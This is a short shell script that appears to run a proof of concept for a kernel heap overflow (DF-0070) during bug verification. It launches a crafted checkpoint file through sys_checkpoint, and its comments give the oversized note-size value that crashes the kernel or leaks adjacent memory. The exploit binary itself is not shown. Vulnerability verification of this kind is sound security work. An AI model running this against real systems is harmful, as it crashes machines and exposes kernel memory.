#!/bin/sh
# DF-0070 PoC run -- exact run invocation used during verification.
#
# Default (panic) mode: builds evil.ckpt and calls sys_checkpoint(CKPT_THAW)
# on it; the crafted n_namesz=0x10000000 drives elf_getnote's bcopy 256 MB
# past the kmalloc(880) note buffer, hitting unmapped KVM -> kernel panic
# (Fatal trap 12 page fault in memmove/bcopy).  Default ckptgroup=0 makes
# this wheel-only, so run as root.
#
# Optional "leak" mode (slab-adjacent 116-byte OOB; usually silent EINVAL):
#   ./run.sh leak
set -e
cd "$(dirname "$0")"
MODE="${1:-panic}"
echo "+ ./df0070 evil.ckpt $MODE"
./df0070 evil.ckpt "$MODE"
echo "RUN_OK"
